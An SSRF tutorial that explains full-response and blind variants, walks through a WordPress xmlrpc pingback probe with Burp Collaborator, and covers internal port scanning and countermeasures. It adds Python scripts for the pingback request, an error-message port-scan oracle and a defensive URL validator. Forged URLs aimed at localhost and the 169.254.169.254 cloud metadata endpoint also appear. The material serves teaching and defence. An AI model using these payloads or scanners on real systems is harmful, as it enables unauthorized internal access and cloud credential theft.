Introduction To SSRF

Server-side request forgery (SSRF) is a vulnerability in which an attacker abuses a web application that fetches URLs on the user's behalf, so that the server itself sends requests to internal or external systems the attacker cannot reach directly. There are two main types: full-response SSRF, where the attacker sees the response from the internal server, and blind SSRF, where no response is returned but the request still leaks information (for example the server's outbound IP address or whether an internal port is open). SSRF can bypass network firewalls to reach sensitive internal data, scan internal networks, or read cloud instance metadata. Strict validation of user-supplied URLs (allowlists rather than blocklists), rejecting loopback, private and link-local destinations, and restricting the server's outbound network access are the main defences.

Uploaded by dawasov843

What is SSRF?

Server-side request forgery is a web vulnerability in which the attacker abuses an intermediary web application that processes specially crafted requests on the attacker's behalf. Because the request originates from the application server, it can reach internal or private network resources (configuration files, users' personal and financial data, databases) that sit behind a firewall, IDS or IPS and are never exposed to the public network.

• In simple terms, the ability to manipulate a web application into sending unauthorized requests to a third-party site or internal resource is known as SSRF.
• SSRF is item A10 in the OWASP Top 10 (2021 edition).

For example, say a web application lets a user fetch the content of a URL and displays it. If the application does not properly validate the URL, the attacker forges the url parameter to reach internal, confidential data. The attacker uses a URL such as:

http://mainsite.com/fetch.php?url=http://internal-server.com/confidential.php

The application can prevent this by validating and sanitizing the user's input and by ensuring that the requests it makes on the user's behalf are never directed at internal resources.

Types of SSRF?
1) Full Response SSRF
In this type the attacker receives the fetched content in the response.
The attacker abuses the trust relationship between systems: a firewall typically allows traffic only from certain [IP:Port] pairs that are on the same local network or explicitly trusted, and an SSRF request, because it originates from the trusted server, inherits that trust.
It can be further divided into two types.
i) SSRF targeting the server itself:
The adversary changes the URL to 127.0.0.1 or localhost to reach services bound only to the loopback interface or to read the web server's own internal files.
For example, a website uses an API to update player scores during a live cricket match:
GET /Cricket/Scores HTTP/1.0
Api=http://data.cricbuzz.com:8080/Cricket/Score/check?matchID=12
The attacker modifies it to:
GET /Cricket/Scores HTTP/1.0
Api=http://localhost/admin
ii) SSRF targeting a back-end server:
The adversary targets back-end components that the vulnerable web server can connect to.
Continuing the example, if the attacker discovers that a back-end host, say 192.168.0.4, is alive with port 80 open, the URL is changed to http://192.168.0.4:80 to reach it.
2) Blind SSRF:
In this type the attacker gets no output from the forged request in the server's response, which makes exploitation harder but not impossible.
Example:
i) XML-RPC enabled SSRF:
XML-RPC is a WordPress feature that allows external applications to interact with the site's core functionality through xmlrpc.php.
Step-1: Identify a WordPress site that exposes xmlrpc.php. If a GET request to www.mainsite.com/xmlrpc.php returns an error, change the request method to POST using Burp Suite.
Step-2: List the methods the site allows by sending an XML-RPC system.listMethods call in the POST body (capture the request in the Burp Suite proxy and add the call there).
Step-3: Check for the pingback.ping method in the response.
Step-4: pingback.ping is the feature by which one WordPress site notifies another when it links to its content.
Send the modified request with the pingback.ping method and two parameters: the Burp Collaborator client link as the source URL and a link on the target site as the target URL.

Method name: pingback.ping

Parameter 1: Burp Collaborator link

Parameter 2: URL of the site

The target site then fetches the Collaborator link to verify the pingback, so the callback shows the address from which the internal server makes outbound requests.
Step-5: Check for the IP address in the Collaborator client's interaction log.

In this example we obtain no sensitive data, only an IP address and proof that the server makes outbound requests on our behalf, which is why it is referred to as blind SSRF.
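As an added example that is not part of the original notes, the following Python script (standard library only) builds the two XML-RPC calls used in steps 2 through 4 and parses a constructed system.listMethods response to decide whether pingback.ping is available. The endpoint, Collaborator and target URLs are placeholders, the sample response is constructed rather than captured, and the only network function (post_xmlrpc) is not exercised offline.

```python
"""XML-RPC calls behind the WordPress pingback blind-SSRF check (added example).

Uses only the Python standard library. SAMPLE_LIST_METHODS_RESPONSE is a
constructed, abbreviated stand-in for what xmlrpc.php returns; all URLs are
placeholders.
"""
import urllib.request
import xmlrpc.client

# Constructed sample of a system.listMethods reply (a real site lists dozens).
SAMPLE_LIST_METHODS_RESPONSE = """<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array></value></param></params></methodResponse>"""


def list_methods_request() -> str:
    """Step-2: POST body that asks xmlrpc.php which methods it exposes."""
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def parse_method_list(body: str) -> list[str]:
    """Step-3: extract the method names from a system.listMethods response.

    xmlrpc.client.loads raises xmlrpc.client.Fault if the server returned <fault>.
    """
    params, _ = xmlrpc.client.loads(body)
    return list(params[0])


def pingback_enabled(body: str) -> bool:
    return "pingback.ping" in parse_method_list(body)


def pingback_request(source_url: str, target_url: str) -> str:
    """Step-4: pingback.ping(sourceURI, targetURI).

    sourceURI is the page that supposedly links to the target (our Collaborator
    URL); targetURI is a post on the target site. WordPress fetches sourceURI to
    verify the link, and that fetch is the outbound request we observe.
    """
    return xmlrpc.client.dumps((source_url, target_url), methodname="pingback.ping")


def parse_call(body: str) -> tuple[str, tuple]:
    """Decode a methodCall body back into (method name, params); handy for checking
    what Burp will send before sending it."""
    params, name = xmlrpc.client.loads(body)
    return name, params


def post_xmlrpc(endpoint: str, body: str, timeout: float = 10.0) -> str:
    """Send a prepared XML-RPC body to xmlrpc.php and return the raw response.

    Network call, not exercised offline. Use only against sites you are
    authorized to test.
    """
    req = urllib.request.Request(
        endpoint, data=body.encode(), method="POST",
        headers={"Content-Type": "text/xml"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # Offline walk-through of steps 2-4 on the constructed response.
    print("methods:", parse_method_list(SAMPLE_LIST_METHODS_RESPONSE))
    if pingback_enabled(SAMPLE_LIST_METHODS_RESPONSE):
        # Placeholder URLs; a real test uses your Burp Collaborator payload.
        print(pingback_request("http://example-collaborator.invalid/x",
                               "http://www.mainsite.com/?p=1"))
```

The pingback verification fetch is the whole point: WordPress will request the source URL regardless of whether the target post exists, so the Collaborator interaction (and its source IP and User-Agent) is the only evidence you get, which is what makes this blind.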

Finding an SSRF?
1) When a URL is used as a parameter in the address bar.

2) When the URL is the value of a hidden field in a form.

3) When only a partial URL, such as a hostname or path, is accepted and the application builds the rest.


Impacts:
1) Bypassing the firewall:
Organizations place a firewall (and often a WAF) in front of their private network so that an attacker cannot reach internal hosts directly. With an SSRF vulnerability the attacker reaches internal resources through the vulnerable web server, whose requests the firewall trusts.
2) Sensitive Data Exposure:
The attacker accesses resources inside the vulnerable web server itself by replacing the original URL with the loopback address, 127.0.0.1 (IPv4) or ::1 (IPv6), or the hostname localhost, reaching services bound only to that interface; where the fetcher also accepts the file:// scheme, the local file system can be read directly.
Example:
Original request:
GET /?url=http://mainsite.com/login.php HTTP/1.1
Modified request:
GET /?url=http://127.0.0.1/etc/Users HTTP/1.1
3) Disclosure of cloud server metadata:
Cloud services such as AWS expose a REST interface on http://169.254.169.254/ from which vital configuration and sometimes authentication keys (temporary instance credentials) can be retrieved. This instance-metadata interface exists on AWS/Amazon EC2, OpenStack and other providers. Newer variants need more than a plain GET, which a simple SSRF may not be able to supply: AWS IMDSv2 requires a session token obtained with a PUT request, and Google Cloud requires a Metadata-Flavor: Google request header.
4) Scanning the internal network:
Attackers can scan internal networks reachable from a vulnerable server by abusing SSRF. Even when they cannot extract data directly, they can use side channels such as page load time, error messages or banners of the probed service to determine whether the targeted service is responding or a tested port is open.
Example:
Say a website uses a service to fetch PDF files and, as a security control, checks that the response's Content-Type HTTP header is application/pdf; if the header is missing or mismatches, it shows an error message.
We check the application's behaviour for different requests:
i. https://site.com/file.php?url=https://example.com/file.pdf
It displays the PDF, meaning the Content-Type header was valid.
ii. https://site.com/file.php?url=https://example.com/index.html
It shows "Only pdf files", because the fetched resource had a different Content-Type.
iii. https://site.com/file.php?url=https://example.app/
It shows "pdf not found", meaning there was an error fetching the resource (unresolvable or unreachable host).
Based on this we try:
https://site.com/file.php?url=http://127.0.0.1:5000
If we get "pdf not found", nothing answered on 127.0.0.1 port 5000. If instead we get "Only pdf files", the internal host responded, so a service is listening on that port.
To automate this the attacker uses Burp Suite Intruder to vary both the IP address and the port number, building a list of live hosts and open ports.
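Added example, not code from the notes: the classification logic behind this scan written as a small Python scanner. The three response strings come from the description above; the internal "network" it probes is a constructed stand-in, and https://site.com/file.php is a placeholder for the real vulnerable endpoint.

```python
"""Turn the PDF-fetcher's error messages into a port-scan oracle (added example).

FAKE_INTERNAL_SERVICES and fake_fetch are constructed so the scan runs offline;
make_http_fetcher is the real thing and is not exercised here.
"""
import urllib.parse
import urllib.request
from typing import Callable, Iterable

# The three distinguishable behaviours described above.
OPEN_PDF = "open (served a PDF)"
OPEN_OTHER = "open (answered, not a PDF)"
CLOSED = "closed or unreachable"


def classify(app_response: str) -> str:
    """Map the application's visible reply to what it implies about the target."""
    text = app_response.lower()
    if "pdf not found" in text:
        return CLOSED        # fetch failed: nothing listening or host unreachable
    if "only pdf files" in text:
        return OPEN_OTHER    # something answered, but Content-Type != application/pdf
    return OPEN_PDF          # a PDF came back, so the port is open too


def scan(fetch: Callable[[str], str], host: str, ports: Iterable[int]) -> dict[int, str]:
    """Probe each port through the vulnerable fetcher.

    fetch(url) must return the application's response body for file.php?url=<url>.
    """
    return {p: classify(fetch(f"http://{host}:{p}/")) for p in ports}


def make_http_fetcher(file_php: str, timeout: float = 10.0) -> Callable[[str], str]:
    """Real fetcher for the placeholder https://site.com/file.php endpoint.

    Network call, not exercised offline; use only with authorization.
    """
    def fetch(url: str) -> str:
        full = file_php + "?" + urllib.parse.urlencode({"url": url})
        with urllib.request.urlopen(full, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    return fetch


# Constructed stand-in for the internal network: port -> Content-Type it answers with.
FAKE_INTERNAL_SERVICES = {
    5000: "text/html",
    8080: "application/json",
    9443: "application/pdf",
}


def fake_fetch(url: str) -> str:
    """Simulates file.php's behaviour against the constructed internal network."""
    port = urllib.parse.urlsplit(url).port or 80
    ctype = FAKE_INTERNAL_SERVICES.get(port)
    if ctype is None:
        return "Error: pdf not found"
    if ctype != "application/pdf":
        return "Error: Only pdf files"
    return "%PDF-1.4 ..."


if __name__ == "__main__":
    for port, state in scan(fake_fetch, "127.0.0.1", [22, 5000, 8080, 9443]).items():
        print(f"127.0.0.1:{port} -> {state}")
```

Swap fake_fetch for make_http_fetcher("https://site.com/file.php") to run it for real; a timing measurement around each fetch (filtered ports usually time out rather than fail fast) adds a fourth state the error text alone cannot give you.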

Countermeasures:
1) Network isolation: Place the server that could be vulnerable to SSRF in a restricted network zone, isolated from the rest of the network and with outbound (egress) access limited to the hosts it legitimately needs, so that a forged request has few places to go.

2) URL validation: Validate user-supplied URLs against an allowlist of permitted schemes, hosts and ports. A blocklist of private addresses alone is easy to bypass (alternate IP encodings, DNS names that resolve to internal addresses, redirects). Resolve the hostname and reject loopback, private, link-local and other reserved ranges before connecting, and do not follow redirects automatically.

3) Input filtering: Filter out any input parameters that could be used to change the destination, such as redirect parameters, so that the attacker cannot steer the request.

4) Content Security Policy (CSP): CSP limits which sources the user's browser will load content from. It is a client-side control and does not stop the server itself from making requests, so it does not prevent SSRF on its own, although it can limit what an attacker can do with the page afterwards.

5) HTTP parameter binding: Bind HTTP parameters to fixed server-side values (for example an identifier that the server maps to a URL) rather than using user input directly in outbound requests.
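The following is an added example, not code from the notes or from any of the referenced sources. It puts the vulnerable fetch.php pattern from the introduction beside a hardened validator that implements countermeasures 2 and 5: an allowlist of schemes, hosts and ports, then resolution of the host and rejection of loopback, private, link-local and other non-public addresses. ALLOWED_HOSTS and the FAKE_DNS resolver are constructed placeholders; resolve_all is the real lookup.

```python
"""Allowlist plus resolve-and-check validation for a server-side fetcher (added example).

The allowlist, the example URLs and FAKE_DNS are constructed; nothing here is
the original fetch.php code.
"""
import ipaddress
import socket
import urllib.parse
from typing import Callable, Iterable, Optional

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
# Hypothetical allowlist: the only external hosts this feature should ever fetch from.
ALLOWED_HOSTS = {"example.com", "cdn.example.com"}


class UnsafeURL(ValueError):
    pass


# Vulnerable pattern (what fetch.php does): whatever the user sends is fetched.
def vulnerable_fetch_target(raw: str) -> str:
    return raw


def is_public_ip(ip: str) -> bool:
    """Reject every range that a user-supplied URL should never be able to reach."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped          # ::ffff:127.0.0.1 is still 127.0.0.1
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def resolve_all(host: str) -> list[str]:
    """Real DNS lookup; the offline demo swaps in fake_resolver instead."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_fetch_url(raw: str,
                       resolver: Callable[[str], Iterable[str]] = resolve_all,
                       allowed_hosts: Optional[set] = ALLOWED_HOSTS) -> tuple[str, list[str]]:
    """Return (hostname, resolved IPs) for a URL that passes every check, else raise.

    allowed_hosts=None means "any public host" for features that must fetch
    arbitrary URLs; the resolve-and-check step is then the only defence. The
    caller should connect to one of the returned IPs (sending Host: hostname)
    rather than resolving again, so a DNS-rebinding change between check and
    use cannot redirect the request, and must re-run this check on every redirect.
    """
    parts = urllib.parse.urlsplit(raw.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")   # blocks file://, gopher://, ...
    host = parts.hostname               # drops userinfo and brackets, lower-cases
    if not host:
        raise UnsafeURL("missing host")
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port not allowed: {port}")
    if allowed_hosts is not None and host not in allowed_hosts:
        raise UnsafeURL(f"host not in allowlist: {host!r}")
    try:
        ips = [str(ipaddress.ip_address(host))]   # IP literal: no lookup needed
    except ValueError:
        ips = list(resolver(host))               # name: check every address it maps to
    if not ips or not all(is_public_ip(ip) for ip in ips):
        raise UnsafeURL(f"{host!r} resolves to a non-public address: {ips}")
    return host, ips


def is_safe_url(raw: str, resolver: Callable[[str], Iterable[str]] = resolve_all,
                allowed_hosts: Optional[set] = ALLOWED_HOSTS) -> bool:
    try:
        validate_fetch_url(raw, resolver, allowed_hosts)
        return True
    except UnsafeURL:
        return False


# Constructed resolver standing in for DNS in the offline demo.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "cdn.example.com": ["93.184.216.34"],
    "evil.example.net": ["169.254.169.254"],   # attacker-controlled name aimed at metadata
}


def fake_resolver(host: str) -> list[str]:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for url in ["https://example.com/file.pdf", "http://127.0.0.1/admin",
                "http://example.com@169.254.169.254/latest/meta-data/",
                "file:///etc/passwd", "http://evil.example.net/", "http://[::1]/"]:
        try:
            print("ALLOW", url, validate_fetch_url(url, fake_resolver, allowed_hosts=None))
        except UnsafeURL as e:
            print("DENY ", url, "->", e)
```

Note that forms such as 0177.0.0.1 or 2130706433 are not accepted by ipaddress.ip_address and so fall through to the resolver; getaddrinfo does turn them into 127.0.0.1, which is why the check runs on the resolved addresses rather than on the string the user typed.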
References:
https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
https://www.invicti.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/
https://brightsec.com/blog/ssrf-attack/#blind-ssrf
https://portswigger.net/web-security/ssrf
